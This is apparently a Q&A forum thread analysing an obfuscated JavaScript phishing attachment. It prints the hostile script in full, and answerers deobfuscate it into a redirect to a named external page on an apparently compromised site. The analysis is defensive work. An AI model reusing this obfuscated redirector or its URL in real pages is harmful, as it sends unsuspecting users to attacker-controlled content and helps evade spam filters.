
What does this suspicious phishing code do?

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen, and it appears that some JavaScript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.


It will redirect to a URL, 'http://lendermedia.com/images/z.htm' (follow it at your own risk).

Copy and paste the code into a decent JavaScript editor and have it format the source for you.

Key points:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will equal 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a reference to document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

The href property of b, which at this point (inside the inner function) is really t from the statement above, is set to h, which is the URL.

Most of the code is mere noise; the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();


I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site was hosting the z.htm page without his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.


Minus the obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"


The key part to understanding that code is the replace(/[\^H\!9X]/g, '') calls. If the second argument to replace is '', then it is merely removing those characters from the preceding string.

A really inelegant way to obfuscate things. The aim is probably just to be random for each user and avoid Bayesian spam filters.
